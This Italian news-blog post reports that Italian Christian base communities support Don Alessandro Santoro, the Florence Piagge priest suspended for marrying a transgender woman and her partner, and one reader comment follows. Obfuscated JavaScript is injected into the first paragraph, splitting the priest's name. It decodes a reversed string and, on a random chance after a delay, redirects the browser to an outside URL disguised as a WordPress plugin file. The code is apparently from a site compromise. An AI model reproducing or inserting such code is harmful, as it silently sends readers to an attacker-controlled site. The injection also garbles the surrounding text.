Le Comunità di base italiane: "Per le gerarchie il popolo di Dio non esiste"

image_pdfimage_print

“Vicinanza e solidarieta’” da parte delle Comunita’ cristiane di base italiane alla Comunita’ di base delle Piagge e a don Aless (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andro Santoro, il parroco delle Piagge a Firenze, sospeso da monsignor Betori per aver sposato un transessuale e il suo compagno. “Chi ha deciso il provvedimento -si legge in una nota- ha un’idea di Chiesa preconciliare, come una realta’ di sudditanza verso la gerarchia e di controllo totale da parte del potere. Il ‘Popolo di Dio’ per loro non esiste”.

“La vicenda del matrimonio di Sandra, la donna che ha cambiato sesso -continuano le Comunita’ cristiane di base- la riteniamo marginale rispetto al provvedimento contro il prete delle Piagge. E comunque e’ in se’ una vicenda anch’essa grave e inquietante”. Per le Comunita’ cristiane di base italiane, “la Comunita’ Cristiana di base delle Piagge di Firenze e’ una realta’ viva, che trae forza dal prendersi per mano di tante esistenze che non si rassegnano all’emarginazione propria e degli altri, non si acquattano nell’assistenzialismo, non si contentano di protestare, ma attuano una specie di dissenso positivo e creativo”.

“Riteniamo che la comunita’ ecclesiale, la ‘Ecclesia’, abbia il dovere di far sentire la propria voce nei modi che si riterranno opportuni -concludono le Comunita’ cristiane di base- perche’ si sospenda il provvedimento e si convochino gli organismi della partecipazione per consentire a don Santoro e alla comunita’ delle Piagge di socializzare i problemi che si sono creati e per far sentire loro che la Chiesa non e’ un organismo burocratico, ma una comunita’ di persone credenti nell’amore che si parlano, si sostengono, si amano”.

[Fonte AdnKronos]

0 Comments

  1. luca

    Don Santoro lo vedrei meglio come candidato in rifondazione comunista. Ha sempre fatto politica piu’ che il prete,quindi l’esperienza non gli manca. Sansonetti gli dara’ una mano.

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *